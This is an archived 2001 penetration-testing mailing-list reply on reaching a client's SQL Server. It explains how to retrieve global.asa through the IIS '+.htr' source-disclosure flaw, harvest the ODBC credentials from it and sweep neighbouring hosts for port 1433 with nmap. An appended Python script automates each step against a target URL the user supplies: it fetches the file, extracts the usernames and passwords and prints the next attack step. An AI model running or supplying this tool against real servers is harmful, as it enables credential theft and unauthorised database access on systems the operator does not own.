Penetration Testing mailing list archives

Re: [PEN-TEST] sql injection with stored procedures


From: Ted Behling <TBehling () MONARCHIS NET>
Date: Thu, 15 Mar 2001 15:30:26 -0500

Try grabbing the global.asa file, with something like:

http://servername.com/global.asa+.htr

Lots of poorly-secured WinNT boxes still haven't applied this patch.
You'll have to View Source in your browser to look at the file.  If this
succeeds, you'll probably have the username/password for the ODBC DSN used
to hit the SQL Server.  Given that, just make a new DSN on your own
computer to access their Web server's SQL Server using TCP/IP.  If the
service isn't running on the same box, use nmap to scan the Web server's
neighbors for machines that have a SQL Server running on port 1433, with
something like:

nmap -sT -p 1433 1.2.3.0/24

where 1.2.3 are the first three bytes of the IP address.

At 12:13 PM 3/15/01 -0300, Cristiano Lincoln Mattos wrote:
      I'm working on a pen-test for a client -- basically, I'm in
a situation where his web app (ASP+SQLServer) does not validate the form
inputs, making SQL injection possible.  What's making this trickier is
that the form inputs are parameters to stored procedures that
the app uses... and the SELECT calls are inside those procedures.

      So, I can inject statements into the stored proc call, but
not into the SELECT calls inside it, as using 's and the like is
not "carried" into the procedure.  An example:


------------------------------------------------
Ted Behling, E-Commerce Consultant
Monarch Information Systems, Inc.
"Because Every Business Should Be An E-Business"

43 Folly Field Road, Unit 4
Hilton Head Island, SC 29928-5434
Toll-free Phone & Fax: 1-800-842-7894
Local or Outside the USA: 1-843-842-7894
mailto:tbehling () monarchis net
http://www.monarchis.net
------------------------------------------------
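The three steps Ted describes (request global.asa with the "+.htr" suffix, pick the ODBC credentials out of the returned source, then either connect to the named host or sweep the web server's /24 for port 1433) as an added worked example; this is editor-supplied code, not Ted's, and not something posted on the list. The global.asa content below is constructed to look like a typical Application_OnStart block and was not captured from any real host; the key names it recognises (DSN, UID, PWD, Server, Data Source, Database, Initial Catalog, User ID, Password) are the usual ODBC/OLE DB connection-string keys. The source-disclosure request only returns anything on an unpatched IIS host that still has the .htr extension mapped, and a browser will try to render the body as HTML, which is why the message says to View Source; the script reads the raw body instead.

```python
import re
from ipaddress import ip_network
from urllib.request import urlopen

# Constructed sample of what a leaked global.asa might contain (not captured
# from any real host). Two styles of connection string are shown: a DSN-based
# one and an OLE DB one that names the SQL Server directly.
SAMPLE_GLOBAL_ASA = """<SCRIPT LANGUAGE="VBScript" RUNAT="Server">
Sub Application_OnStart
    Application("ConnString") = "DSN=shopdb;UID=sa;PWD=changeme1;"
End Sub
Sub Session_OnStart
    Session("DB") = "Provider=SQLOLEDB;Data Source=10.1.2.7,1433;Initial Catalog=shop;User ID=webapp;Password=Summer2001"
End Sub
</SCRIPT>
"""

# Canonical names for the connection-string keys we care about.
KEY_ALIASES = {
    "dsn": "dsn",
    "uid": "user", "user id": "user", "user": "user",
    "pwd": "password", "password": "password",
    "server": "server", "data source": "server", "address": "server",
    "database": "database", "initial catalog": "database",
}


def htr_disclosure_url(base, path="/global.asa"):
    """Build the '+.htr' request that, on an unpatched IIS box, returns the
    source of a server-side file instead of executing it."""
    return base.rstrip("/") + path + "+.htr"


def fetch_source(url):
    """Fetch the raw body (what 'View Source' shows) as text. Only called
    when run as a script against a URL you supply."""
    with urlopen(url) as resp:
        return resp.read().decode("latin-1", errors="replace")


def parse_connection_strings(asa_source):
    """Pull every VBScript string literal that looks like an ODBC/OLE DB
    connection string out of the ASA source and normalise its keys."""
    found = []
    # Literals on one line, taken in order so "ConnString" and the value are
    # separate matches; a literal with no '=' yields no parts and is skipped.
    for literal in re.findall(r'"([^"\r\n]*)"', asa_source):
        parts = {}
        for piece in literal.split(";"):
            if "=" not in piece:
                continue
            key, value = piece.split("=", 1)
            canon = KEY_ALIASES.get(key.strip().lower())
            if canon:
                parts[canon] = value.strip()
        if "password" in parts or "dsn" in parts:
            found.append(parts)
    return found


def sql_server_scan_command(web_server_ip):
    """The nmap sweep from the message, with the /24 derived from the
    web server's own address rather than typed by hand."""
    net = ip_network(f"{web_server_ip}/24", strict=False)
    return f"nmap -sT -p 1433 {net}"


def next_step(cred, web_server_ip):
    """Where to point the DSN you create locally: the host named in the
    leaked string if there is one, otherwise the sweep of the web
    server's /24 to find the SQL Server."""
    if cred.get("server"):
        return f"connect to {cred['server']} as {cred.get('user', '?')}"
    return sql_server_scan_command(web_server_ip)


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        # Usage: script.py http://servername.com 1.2.3.44
        source = fetch_source(htr_disclosure_url(sys.argv[1]))
        web_ip = sys.argv[2]
    else:
        source, web_ip = SAMPLE_GLOBAL_ASA, "1.2.3.44"
    for cred in parse_connection_strings(source):
        print(cred, "->", next_step(cred, web_ip))
```

Run with no arguments it works through the constructed sample; with a base URL and the web server's IP it issues the "+.htr" request for you. A DSN-only string tells you the credentials but not the host, which is exactly the case where the nmap sweep is needed; an OLE DB string with a Data Source saves you the scan.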

